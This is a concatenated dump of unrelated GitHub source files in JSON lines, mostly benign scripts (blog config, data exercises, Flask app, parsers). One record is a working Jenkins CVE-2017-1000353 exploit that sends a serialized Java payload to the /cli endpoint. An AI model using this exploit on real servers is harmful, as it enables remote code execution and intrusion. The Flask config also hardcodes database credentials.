sort_by_number_of_articles(tags):\n return sorted(tags, reverse=True, key=lambda tag: len(tag[1]))\n\n\n# Custom filters\nJINJA_FILTERS = {'sort_by_number_of_articles': sort_by_number_of_articles}\n\n# Custom Markdown config.\n# See MARKDOWN here:\n# https://docs.getpelican.com/en/stable/settings.html#basic-settings\nMARKDOWN = {\n 'extension_configs': {\n 'markdown.extensions.codehilite': {'css_class': 'highlight'},\n 'markdown.extensions.meta': {},\n 'pymdownx.extra': {},\n },\n 'output_format': 'html5',\n}\n","repo_name":"and-semakin/blog_source","sub_path":"pelican/pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"41265795544","text":"# 2.\n# Напишите скрипт urbanization.py, получающий на вход переменную regions — строку с названиями стран через запятую.\n# Внутри скрипта прочитайте переменную urbanization из файла data/urbanization.csv.\n# Отфильтруйте только страны, указанные во входном параметре, и определите для них максимальный уровень урбанизации за всю историю наблюдений.\n# Формат входного параметра:\n# Unix-имя: r\n# GNU-имя: regions\n# Ваш скрипт вызывается так:\n# python urbanization.py --regions='Germany,France,Russia'\n\n# Подсказка:\n# Проверьте переменные unixOptions и gnuOptions.\n# В блоке обработки параметров конвертируйте строки с именами стран в массив методом split(',').\n\n#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nimport getopt\n\nimport pandas as pd\n\nif __name__ == \"__main__\":\n\n # Задаём определения входных параметров\n unixOptions = \"r:\" # напишите код\n gnuOptions = [\"regions=\"] # напишите код\n\n # Читаем входные параметры\n fullCmdArguments = sys.argv\n argumentList = fullCmdArguments[1:]\n try:\n arguments, values = getopt.getopt(argumentList, unixOptions, gnuOptions)\n except getopt.error as err:\n print(str(err))\n sys.exit(2)\n\n # Обрабатываем входные параметры\n regions = 'Germany,France,Russia'.split(',')\n for currentArgument, currentValue in arguments:\n if currentArgument in (\"-r\",\"--regions\"): # ваш код здесь\n regions = currentValue.split(',') # ваш код здесь\n\n urbanization = pd.read_csv('/datasets/urbanization.csv')\n\n # Фильтруем и определяем максимальный уровень урбанизации\n urbanization = urbanization.query('Entity in @regions')\n urbanization = urbanization.groupby('Entity').agg({'Urban': 'max'}) # ваш код\n\n print(urbanization)","repo_name":"parabatareek/DataAnalyst","sub_path":"Study/Sprint 15 - Автоматизация/1. Основы запуска скриптов/1.2 script_console_start.py","file_name":"1.2 script_console_start.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"45009274978","text":"# Author: Sheikh Rabiul Islam\n# Date: 07/19/2019\n# Purpose: preprocess data by running following 5 files for experiment 1\n# data_merger.py -> merge individual csv files in to a single file following same format (same column structure).\n# data_sampler.py -> sample specified number of records using stratified sampling technique. \n# data_preprocess_all_features.py -> preprocess data using all features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n# data_preprocess_selected_features.py -> preprocess data using selected features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n# data_preprocess_domain_features.py -> preprocess data using domain features, saves fully preprocessed data in binary format (as numpy array with format .npy)\n\t\nimport time\n\nstart = time.time()\nexec(open(\"data_merger.py\").read())\nend = time.time()\nprint(\"Time taken by data_merger.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_sampler.py\").read())\nend = time.time()\nprint(\"Time taken by data_sampler.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_all_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_all_features.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_selected_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_selected_features.py:\", end-start)\n\nstart = time.time()\nexec(open(\"data_preprocess_domain_features.py\").read())\nend = time.time()\nprint(\"Time taken by data_preprocess_domain_features.py:\", end-start)\n","repo_name":"SheikhRabiul/domain-knowledge-aided-explainable-ai-for-intrusion-detection-and-response","sub_path":"process_data.py","file_name":"process_data.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"41315748954","text":"from bs4 import BeautifulSoup\nfrom couchpotato.core.helpers.encoding import tryUrlencode, toUnicode\nfrom couchpotato.core.helpers.variable import tryInt\nfrom couchpotato.core.logger import CPLog\nfrom couchpotato.core.providers.torrent.base import TorrentProvider\nimport traceback\nimport re\n\nlog = CPLog(__name__)\n\n\nclass TehConnection(TorrentProvider):\n\n urls = {\n 'test': 'https://tehconnection.eu/',\n 'login': 'https://tehconnection.eu/login.php',\n 'login_check': 'https://tehconnection.eu/index.php',\n 'detail': 'https://tehconnection.eu/details?id=%s',\n 'search': 'https://tehconnection.eu/torrents.php?action=advanced&%s',\n 'download': 'https://tehconnection.eu%s',\n }\n\n http_time_between_calls = 1 #seconds\n\n def _search(self, movie, quality, results):\n\n # need to try logging in before every search\n if not '/logout.php' in self.urlopen(self.urls['login'], data = self.getLoginParams()).lower():\n log.info('problems logging into tehconnection.eu')\n return []\n\n data = self.getHTMLData(self.urls['search'] % tryUrlencode({'torrentname': '%s' % movie['library']['identifier'],'order_by': 's3'}))\n if data:\n try:\n resultsTable = BeautifulSoup(data).find('table', attrs = {'id' : 'browse_torrent_table'})\n if resultsTable is None:\n log.info('movie not found on TehConnection')\n return []\n year = resultsTable.find('font', attrs = {'class' : 'subtext'}).find('a')\n title_div = resultsTable.find('div', attrs = {'class' : 'torrent_title'}).find('a')\n id = title_div['href'].replace('/torrents.php?id=', '')\n releases = resultsTable.find_all('tr', attrs = {'class' : \"groupid_%s\" % (id) })\n\n for result in releases:\n log.info('teh connection found ' + re.sub(\"\\s+\" , \" \",re.sub(r'<.*?>', '','%s (%s) %s' % (title_div.string, year.string, unicode(result.find_all('td')[1].find_all('a')[2])))))\n results.append({\n\t\t\t 'leechers': result.find_all('td')[7].string, \n\t\t\t 'seeders': result.find_all('td')[6].string, \n\t\t\t 'name': re.sub(\"\\s+\" , \" \",re.sub(r'<.*?>', '','%s (%s) %s' % (title_div.string, year.string, unicode(result.find_all('td')[1].find_all('a')[2])))), \n\t\t\t 'url': self.urls['download'] % result.find('a', attrs = {'title' : 'Download'})['href'].replace('amp;',''), \n\t\t\t 'detail_url': self.urls['download'] % result.find('a', attrs = {'title' : 'Download'})['href'].replace('amp;',''), \n\t\t\t 'id': '%s %s' % (id,self.parseSize(result.find_all('td')[4].string)), \n\t\t\t 'size': self.parseSize(result.find_all('td')[4].string)\n })\n\n except:\n log.error('Failed getting results from %s: %s', (self.getName(), traceback.format_exc()))\n\n def getLoginParams(self):\n return {\n 'username': self.conf('username'),\n 'password': self.conf('password'),\n 'submit': 'Log In!',\n }\n\n def loginSuccess(self, output):\n return True\n","repo_name":"Kopoe2003/CouchPotatoTehConnectionPlugin","sub_path":"couchpotato/core/providers/torrent/tehconnection/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3197,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"15676839747","text":"import sys\nsys.path.insert(0, 'C:\\\\Users\\\\Utente\\\\Desktop\\\\Dev\\\\Progetti\\\\OrderAi\\\\lib\\\\')\nfrom stats import *\n\ndef run_model(data, model):\n k = 0\n for data in data.as_numpy_iterator():\n X_train, XN_train, y_train, X_test, XN_test, y_test = data\n model.run(X_train, X_test, XN_train, XN_test, tf.squeeze(y_train), tf.squeeze(y_test), k)\n write_stats(X_train.shape[0]+X_test.shape[0], X_train.shape[1], model.loss_history[-1], epochs, lr, batch_size, kk, model.r2_accuracy_tt[-1].numpy(), model.train_mse.result().numpy(), model.test_mse.result().numpy(), model.train_mae.result().numpy(), model.test_mae.result().numpy(), model.residual_tr[-1].numpy(), model.residual_tt[-1].numpy())\n k = k+1 \n break\n return X_train, X_test, XN_train, XN_test, tf.squeeze(y_train), tf.squeeze(y_test)\n ","repo_name":"cecinuga/MarketAI","sub_path":"lib/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29533726385","text":"\"\"\"\nAuthor: Gabriel Chicote\n\"\"\"\nfrom typing import Dict, List\nfrom pathlib import Path\nimport argparse, sys, os\n\n# Create the parser\nparser = argparse.ArgumentParser(\n\t\tdescription='Parse files from [.feature] format into [.e2e.js] format' )\n\n# Define parser version\nparser.version = 'Feature parser. version: 1.0'\n\n# Add the arguments\nparser.add_argument('Path',\n\t\t\t\t\tmetavar='path',\n\t\t\t\t\ttype=Path,\n\t\t\t\t\tnargs='+',\n\t\t\t\t\thelp='Path to work with')\nparser.add_argument('-d',\n\t\t\t\t\t'--dir',\n\t\t\t\t\taction='store_true',\n\t\t\t\t\tdest='directory',\n\t\t\t\t\thelp='parses all files in specified directory')\nparser.add_argument('-V',\n\t\t\t\t\t'--version',\n\t\t\t\t\taction='version',\n\t\t\t\t\thelp='shows CLI version')\n\n# Execute parse_args()\nargs = parser.parse_args()\n\n\ndef insert_header(output_file: str) -> None:\n\t\"\"\" Escribe en el archivo de salida un header y el import por default.\n\t\"\"\"\n\n\toutput_file.write( \"/*\\n * Author: Gabriel Chicote\\n */\\n\" )\n\toutput_file.write( \"\\n// Add corresponding imports. Example:\\nimport { describe } from 'jest-circus';\\n\" )\n\toutput_file.write('\\n')\n\n\ndef insert_feature_desc(output_file: str, feature: str, user_story: str) -> None:\n\t\"\"\" Escribe en el archivo de salida la descripcion del feature y las dos\n\tfunciones por default para todos los archivos de test.\n\t\"\"\"\n\n\toutput_file.write( f\"describe( '{user_story} - {feature}', () => {'{'}\\n\\n\" )\n\toutput_file.write( \"\\tbeforeAll( () => {\\n\\t\\tawait device.launchApp();\\n\\t} );\\n\\n\" )\n\toutput_file.write( \"\\tbeforeEach( () => {\\n\\t\\tawait device.reloadReactNative();\\n\\t} );\\n\\n\" )\n\n\ndef format_scenario(dicc: Dict[str, str]) -> str:\n\t\"\"\" Toma un diccionario de pares , formatea un\n\tstep definition a partir del mismo y lo devuelve como cadena.\n\t\"\"\"\n\n\tstr = '''\n\tdescribe( '{}', () => {{ \n\n\t\tconst given = '{}'\n\t\tconst when = '{}'\n\t\tconst then = '{}'\n\n\t\ttest( `${{given}}, ${{when}} ${{then}}`, async () => {{ \n\t\t\t// TODO\n\t\t}})\n\n\t}} ); \n\t'''.format(dicc['scenario'], dicc['given'], dicc['when'], dicc['then'])\n\treturn str\n\t\n\ndef insert_scenario(parts: Dict[str, str], output_file: str) -> None:\n\t\"\"\" Inserta un escenario, previamente formateado por 'format_scenario()',\n\ten el archivo de salida.\n\t\"\"\"\n\n\toutput_file.write(format_scenario(parts))\n\n\ndef write_file(lines: List[str], output_file: str) -> None:\n\t\"\"\" Recorre y parsea las lineas del file, y escribe el resultado en el \n\toutput file cuando corresponda.\n\t\"\"\"\n\n\tfeature = \"\"\n\tuser_story = \"\"\n\tparts = { 'scenario': \"\"\n\t\t\t, 'given': \"\"\n\t\t\t, 'when': \"\"\n\t\t\t, 'then': \"\"\n\t}\n\n\twith open(output_file, 'w') as f:\n\t\t# File header\n\t\tinsert_header(f)\n\n\t\tfor i in range(0, len( lines )):\n\t\t\tl = lines[i].split()\n\t\t\tif \"Feature\" in l[0]:\n\t\t\t\tfeature = ' '.join( l[1:] )\n\t\t\telif \"US\" in l[0]:\n\t\t\t\tuser_story = l[0][:-1]\n\t\t\t\tinsert_feature_desc(f, feature, user_story)\n\t\t\telif \"Scenario\" in l[0]:\n\t\t\t\tparts['scenario'] = ' '.join( l[1:] )\n\t\t\telif \"Given\" in l[0]:\n\t\t\t\tparts['given'] = ' '.join( l )\n\t\t\telif \"When\" in l[0]:\n\t\t\t\tparts['when'] = ' '.join( l )\n\t\t\telif \"Then\" in l[0]:\n\t\t\t\tparts['then'] = ' '.join( l )\n\t\t\t\tinsert_scenario(parts, f)\n\t\t\t\tparts = parts.fromkeys(parts, \"\")\n\n\t\t# Llave y parentesis finales.\n\t\tf.write(\"\\n});\\n\") \n\n\ndef prepare_input_file(input_file: str, output_file: str) -> None:\n\t\"\"\" Abre el archivo de lectura limpia las lineas que se van a usar y\n\tdelega el trabajo de parseo y insertado a 'parse_lines()'\n\t\"\"\"\n\n\twith open(input_file, 'r') as f:\n\t\twrite_file(\n\t\t\tlist(filter( lambda x: x != '' , map(str.strip, f.readlines()))),\n\t\t\toutput_file\n\t\t)\n\n\ndef prepare_output_file(input_file: str, output_dir: str) -> None:\n\t\"\"\" Crea y guarda un archivo de salida para el archivo de entrada.\n\t\"\"\"\n\n\tn = 0\n\toutput_file_name = \"{}{}.e2e.js\"\n\n\twhile (\n\t\tos.path.isfile(\n\t\t\tos.path.join(\n\t\t\t\toutput_dir,\n\t\t\t\toutput_file_name.format(\n\t\t\t\t\tos.path.basename(input_file).split('.')[0],\n\t\t\t\t\t'' if n == 0 else '_{}'.format(n)\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\t):\n\t\tn += 1\n\toutput_path = os.path.join( output_dir, output_file_name.format( os.path.basename(input_file).split('.')[0], '' if n == 0 else '_{}'.format(n) ) )\n\tprepare_input_file( input_file, output_path )\n\n\ndef parse_n_files(paths: List[str] ) -> None:\n\t\"\"\" Crea y guarda un archivo final para cada archivo parametro.\n\t\"\"\"\n\n\toutput_dir = create_dir( os.path.split(str(paths[0]))[0] ) \n\tfor file_path in paths:\n\t\tprepare_output_file( file_path, output_dir )\n\n\ndef parse_all_files_in_dir(dir: str) -> None:\n\t\"\"\" Crea y guarda un archivo final para cada archivo del directorio dado.\n\t\"\"\"\n\n\toutput_dir = create_dir(dir)\n\tfiles = filter(\n\t\t\t\tlambda f: os.path.isfile(f) and os.path.basename(f).startswith(\"US\") and os.path.basename(f).endswith(\".feature\"),\n\t\t\t\tmap( lambda x: os.path.join(dir, x), os.listdir(dir) )\n\t\t\t)\n\tfor file in files:\n\t\tprepare_output_file( file, output_dir )\n\n\ndef create_dir(dir: str) -> None:\n\t\"\"\" Crea el directorio 'step_definitions' si este no existe.\n\t\"\"\"\n\n\toutput_dir = 'step_definitions'\n\tif not os.path.exists(os.path.join(dir, output_dir)):\n\t\tos.mkdir( os.path.join(dir, output_dir) )\n\treturn os.path.join(dir, output_dir)\n\n\n\ndef main() -> None:\n\n\tif args.directory:\n\t\tif not os.path.isdir( args.Path[0] ):\n\t\t\tsys.exit(f\"Error! {args.Path} is not a directory.\")\n\t\telif len( args.Path ) > 1:\n\t\t\tsys.exit(f\"Error! Only one directory is accepted.\")\n\t\tparse_all_files_in_dir( args.Path[0] )\n\telse:\n\t\tfor file in args.Path:\n\t\t\tif not os.path.isfile( file ):\n\t\t\t\tsys.exit(f\"Error! {file} is not a file.\")\n\t\tparse_n_files( args.Path )\n\n\n\n\nif __name__ == \"__main__\":\n\tmain()\n\n","repo_name":"GChicote/feature_parser","sub_path":"feature_parser.py","file_name":"feature_parser.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"32404427132","text":"import collections\nfrom typing import List\n\n\nclass Solution:\n def isPossibleDivide(self, nums: List[int], k: int) -> bool:\n count = collections.Counter(nums)\n keys = list(count.keys())\n keys.sort()\n for n in keys:\n if count[n] > 0:\n minus = count[n]\n for i in range(n, n + k):\n if count[i] < minus:\n return False\n count[i] -= minus\n return True\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3, 3, 4, 4, 5, 6]\n k = 4\n solution = Solution()\n result = solution.isPossibleDivide(nums, k)\n print(result)\n","repo_name":"sudhirsinghshekhawat/problem_solving","sub_path":"leetcode/posibleconsecutive.py","file_name":"posibleconsecutive.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"71023217117","text":"import urllib\nimport sys\nimport requests\nimport uuid\nimport threading\nimport time\nimport gzip\nimport urllib3\nimport zlib\n\nproxies = {\n# 'http': 'http://127.0.0.1:8085',\n# 'https': 'http://127.0.0.1:8090',\n}\n\nURL = '%s/cli' % sys.argv[1].rstrip('/')\n\nPREAMLE = b'<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='\nPROTO = b'\\x00\\x00\\x00\\x00'\n\nwith open(sys.argv[2], \"rb\") as f:\n FILE_SER = f.read()\n\ndef download(url, session):\n\n headers = {'Side' : 'download'}\n headers['Content-type'] = 'application/x-www-form-urlencoded'\n headers['Session'] = session\n headers['Transfer-Encoding'] = 'chunked'\n r = requests.post(url, data=null_payload(), headers=headers, proxies=proxies, stream=True, verify=False)\n print(r.content)\n\n\ndef upload(url, session, data):\n\n headers = {'Side' : 'upload'}\n headers['Session'] = session\n headers['Content-type'] = 'application/octet-stream'\n headers['Accept-Encoding'] = None\n r = requests.post(url,data=data,headers=headers,proxies=proxies, verify=False)\n\n\ndef upload_chunked(url,session, data):\n\n headers = {'Side' : 'upload'}\n headers['Session'] = session\n headers['Content-type'] = 'application/octet-stream'\n headers['Accept-Encoding']= None\n headers['Transfer-Encoding'] = 'chunked'\n headers['Cache-Control'] = 'no-cache'\n\n r = requests.post(url, headers=headers, data=create_payload_chunked(), proxies=proxies, verify=False)\n\n\ndef null_payload():\n yield b\" \"\n\ndef create_payload():\n payload = PREAMLE + PROTO + FILE_SER\n\n return payload\n\ndef create_payload_chunked():\n yield PREAMLE\n yield PROTO\n yield FILE_SER\n\ndef main():\n print(\"start\")\n\n session = str(uuid.uuid4())\n\n t = threading.Thread(target=download, args=(URL, session))\n t.start()\n \n time.sleep(2)\n print(\"pwn\")\n #upload(URL, session, create_payload())\n\n upload_chunked(URL, session, \"asdf\")\n\nif __name__ == \"__main__\":\n main()","repo_name":"DawnFlame/POChouse","sub_path":"Jenkins/Jenkins-CI 远程代码执行漏洞(CVE-2017-1000353)/CVE-2017-1000353.py","file_name":"CVE-2017-1000353.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":896,"dataset":"github-code","pt":"50"} +{"seq_id":"37664154543","text":"from random import randint\n\nfrom pymetaheuristics.genetic_algorithm.model import GeneticAlgorithm\n\nitems = [\n [25, 1.2],\n [40, 7.6],\n [10, 2.5],\n [17, 1.5],\n [42, 1.1],\n [29, 3.1],\n [14, 0.5],\n [36, 3.5],\n]\n\n\ndef genome_generator():\n genome = list()\n for _ in range(len(items)):\n genome.append(randint(0, 1))\n return genome\n\n\ndef fitness_function(genome):\n score = 0\n for i, digit in enumerate(genome):\n score += digit * items[i][1]\n return score * -1\n\n\ndef maximun_capacity(genome):\n weight = 0\n for i, digit in enumerate(genome):\n weight += digit * items[i][0]\n return weight <= 100\n\n\nmodel = GeneticAlgorithm(\n genome_generator=genome_generator,\n fitness_function=fitness_function\n)\n\nmodel.add_constraint(maximun_capacity)\n\nresult = model.train(30, 10, k=5, verbose=True)\n\nprint(\"Genetic Algorithm result\", result, sep=\"\\n\")\nprint(\"Ground Truth\", ([0, 1, 1, 1, 0, 1, 0, 0], -14.7), sep=\"\\n\")\n\nans = (14.7 - abs(round(result[1], 2))) / 14.7\nprint(round(ans*100, 2), \"%... off the optimal\")\n","repo_name":"igormcsouza/pymetaheuristics","sub_path":"tests/genetic_algorithm/integration/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"36072457414","text":"import time\nfrom l05.l05_u5 import Bod2G\n\n\nclass Bod2GG(Bod2G):\n def __init__(self, x, y, vx, vy):\n super().__init__(x, y, vx, vy)\n\n def __str__(self):\n return super().__str__()\n\n def __eq__(self, other):\n return super().__eq__(other)\n\n def krok(self):\n if abs(self.y) - abs(self.vy) <= 0:\n temp_y = -self.y\n temp_vy = self.vy\n self.vy = temp_y\n super().krok()\n self.vy = abs(temp_vy) - abs(temp_y)\n super().krok()\n else:\n super().krok()\n\n\nb = Bod2GG(0.0, 100.0, 0.0, 50.0)\nt = 0\nprint(\"t[s] x[m] y[m] vx[m/s] vy[m/s]\")\nprint(t, b)\n\nwhile True:\n b.krok()\n t += 1\n print(t, b)\n time.sleep(1)\n","repo_name":"samtaborsky/slo-uprog1","sub_path":"l06/l06_u4.py","file_name":"l06_u4.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"74799592155","text":"import torch\nfrom lib import svp, svp_newton\n\ntorch.random.manual_seed(123)\nM = 100\nN = 200\nC = 3\nrank = 10\n\ngt = torch.rand((C, M, N))\nU, S, Vh = torch.linalg.svd(gt,full_matrices=False)\nS[:, rank:] = 0\ngt = U @ torch.diag_embed(S) @ Vh\n\nindices = torch.randperm(M * N)[: int(0.6 * M * N)] # 20% elements are observed\nmask = torch.zeros(M * N, dtype=torch.int32)\nmask[indices] = 1\nmask = mask.reshape([M, N])\nobserved_matrix = mask[None] * gt\n\nproblem = dict(\n channel = 1,\n size=[M, N],\n gt=gt,\n rank=rank,\n observed_matrix=observed_matrix,\n mask=mask,\n method=svp_newton,\n # method=svp,\n step=1,\n tol=1e-4,\n device=\"cuda:0\"\n)\n\ndel(torch)","repo_name":"xuan-li/270A-Project","sub_path":"example/random_matrix.py","file_name":"random_matrix.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"39560182292","text":"from pprint import pprint\nimport sys,os,inspect\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, current_dir) \nfrom flask_sqlalchemy import SQLAlchemy\nimport flask\nfrom flask_migrate import Migrate,MigrateCommand\nfrom flask_script import Manager\nfrom flask_login import LoginManager\nfrom dashboards.dashapp1 import Dash_app\nfrom dashboards.dashapp2 import Dash_app2\n\n# from Dashboards import DashApp1\nclass Config:\n\tSECRET_KEY = 'asdwer43f5t65yuhrgefw'\n\t# server \n# \tSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://kooka2:1@localhost:3306/test2'\n\tSQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:1@localhost:27017/gshop'\n\tSQLALCHEMY_TRACK_MODIFICATIONS = True\n\t# UPLOAD_FOLDER = '/media/alex/Data1/two/YAPI3/app/DashRoutes/csv_files'\n\tSEND_FILE_MAX_AGE_DEFAULT = 0\n\nclass App:\n\tdef __init__(self):\n\t\tself.flask = flask \n\t\tself.app = self.flask.Flask(__name__, static_folder='home/static',template_folder = 'home/templates')\n\t\tself.app.config.from_object(Config)\n\t\tself.db = SQLAlchemy(self.app)\n\n\tdef register_blueprints(self):\n\t\tfrom avtoshop.routes import avtoshop\n\t\tfrom evernote.routes import evernote\n\t\tfrom rueng.routes import rueng\n\t\tfrom yapi.routes import yapi\n\t\tfrom settings.routes import settings\n\t\tfrom home.routes import home\n\t\tfrom dashroutes.routes import dashroute\n\t\tself.app.register_blueprint(yapi,url_prefix='/yapi')\n\t\tself.app.register_blueprint(avtoshop,url_prefix='/avtoshop')\n\t\tself.app.register_blueprint(evernote,url_prefix='/evernote')\n\t\tself.app.register_blueprint(rueng,url_prefix='/rueng')\n\t\tself.app.register_blueprint(home,url_prefix='/')\n\t\tself.app.register_blueprint(settings,url_prefix='/settings')\n\t\tself.app.register_blueprint(dashroute,url_prefix='/DashExample')\n\t\tDash_app(self.app).get_dash_app()\n\t\tDash_app2(self.app).get_dash_app()\n\n\t\t# DashApp1.Add_Dash(self.app)\n\n\tdef login_manager(self):\n\t\tlogin_manager = LoginManager()\n\t\tlogin_manager.init_app(self.app)\n\t\tlogin_manager.login_viwe = 'login'\n\t\treturn login_manager\n\n\tdef migrate(self):\n\t\tmigrate = Migrate(self.app,self.db)\n\t\tmanager = Manager(self.app)\n\t\tmanager.add_command('db',MigrateCommand)\n\t\treturn manager\n\t\t\n\tdef get_app(self):\n\t\treturn self.app\n\n\tdef get_db(self):\n\t\treturn self.db\n\n\tdef get_flask(self):\n\t\treturn self.flask\n","repo_name":"MrKooka/mega","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"35780909833","text":"from google.appengine.ext import ndb\r\nfrom google.appengine.api import search\r\n\r\n\r\nclass Donations(ndb.Model):\r\n user = ndb.KeyProperty(kind='Users')\r\n title = ndb.StringProperty(required=True)\r\n city = ndb.StringProperty(required=True)\r\n country = ndb.StringProperty(required=True)\r\n state=ndb.StringProperty(required=True)\r\n quantity = ndb.IntegerProperty(required=True)\r\n comments = ndb.TextProperty()\r\n photo_key = ndb.BlobKeyProperty()\r\n photo_url = ndb.StringProperty()\r\n\r\n\r\n @classmethod\r\n def add_new_donation(cls, title, quantity, city, country, state,comments, photo_key, photo_url, user_key=None):\r\n user_id = str(user_key.id())\r\n donation_key = cls(title=title, quantity=quantity, city=city, country=country,state=state, comments=comments,\r\n photo_key=photo_key, photo_url=photo_url, user=user_key).put()\r\n index = search.Index('donation')\r\n doc = search.Document(doc_id=str(donation_key.id()), fields=[search.TextField(name='title', value=title),\r\n search.TextField(name='city', value=city),\r\n search.TextField(name='country', value=country),\r\n search.TextField(name='state', value=state),\r\n search.TextField(name='comments', value=comments),\r\n search.NumberField(name='quantity',\r\n value=quantity),\r\n search.TextField(name='photo_url',\r\n value=photo_url),\r\n search.TextField(name='user_id', value=user_id)], )\r\n index.put(doc)\r\n\r\n @classmethod\r\n def get_all_donations_user(cls, user_id):\r\n index = search.Index('donation')\r\n query = 'user_id:(%s)' % user_id\r\n results = index.search(query)\r\n return results.results","repo_name":"kartit/cloudProject","sub_path":"default/modals/donation.py","file_name":"donation.py","file_ext":"py","file_size_in_byte":2304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"10314693314","text":"import socket\n\n#Solo podemos coger puertos mayores a 1024\nPORT = 1024\nHOST = \"localhost\"\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.bind((HOST, PORT))\n\nbuffer, addr = s.recvfrom(1024) #addr será una tupla (ip, puerto).\n #El receive será bloqueante, se quedará parado hasta que reciva un mensaje\n #Cada receive recibe un mensaje, si mandamos mas de 1, tenemos que hacer más\nprint(\"Received message: '\" + buffer.decode(\"utf-8\") + \"'\")\nprint(\"From address: '\" + str(addr) + \"'\")\n\ns.close()","repo_name":"Alexzape92/SD","sub_path":"Ejemplos_socket/udp_server.py","file_name":"udp_server.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27332058220","text":"import os\nfrom unittest import mock\n\n\ndef test_index():\n with mock.patch.dict(os.environ, {\"DYNAMODB_TABLE\": \"hiya\"}, clear=True):\n import api.authoriser.index as index\n\n result = index.handler(event={\"methodArn\": \"foo\"})\n assert result == {\n \"principalId\": index.__file__,\n \"context\": {},\n \"policyDocument\": {\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Action\": \"execute-api:Invoke\",\n \"Effect\": \"Allow\",\n \"Resource\": \"foo\",\n }\n ],\n },\n }\n","repo_name":"NHSDigital/connecting-party-manager","sub_path":"src/api/authoriser/tests/test_index.py","file_name":"test_index.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18525587406","text":"import requests\nimport json\nimport threading\nimport time\n\nlock=threading.Lock()\n\nheaders = {\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n 'Host':'sysjk.ivdc.org.cn:8081',\n 'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0\"}\n\ndef table_page(page):\n data={\n 'start':page*20,\n 'limit':20,\n 'condList':'',\n 'datatype':'all'\n }\n html=requests.post('http://sysjk.ivdc.org.cn:8081/cx/querysyjdcjjg/querysyjdcjjg.do', data=data,headers=headers).text\n data=json.loads(html)['rows']\n result=[]\n keys=['byx', 'jyxm', 'jylb', 'itemid', 'cpmc', 'bz', 'jyyj', 'jyjl', 'ph', 'cjhj', 'bhgxm', 'bcscqy', 'cpwh', 'shr', 'bcydwmc', 'jd', 'shrq', 'nd']\n for item in data:\n '''\n for key in item:\n keys.append(key)\n print(keys)\n return\n '''\n line=[]\n for key in keys:\n try:\n line.append(item[key])\n except:\n line.append('')\n result.append(line)\n return result\n\nclass Query(threading.Thread):\n def __init__(self,line):\n super(Query,self).__init__()\n self.line=line\n self.num=line[-6]\n\n def run(self):\n data={\n 'start':0,\n 'limit':1,\n 'condList':str([{\"itemname\":\"pzwh\",\"itemfieldname\":\"pzwh\",\"itemval\":self.num,\"itemtype\":\"String\",\"condType\":\"val\",\"compareType\":\"equal\"}])\n }\n try:\n html=requests.post('http://sysjk.ivdc.org.cn:8081/cx/querysycppzwh/querySycppzwhData.do', data=data,headers=headers,timeout=30).text\n data=json.loads(html)['rows']\n keys=['gg', 'tym', 'yxq', 'zxbz', 'zt', 'byx', 'pzwh', 'bgqk', 'spm', 'slh', 'pzrq', 'qymc', 'shr', 'shrq', 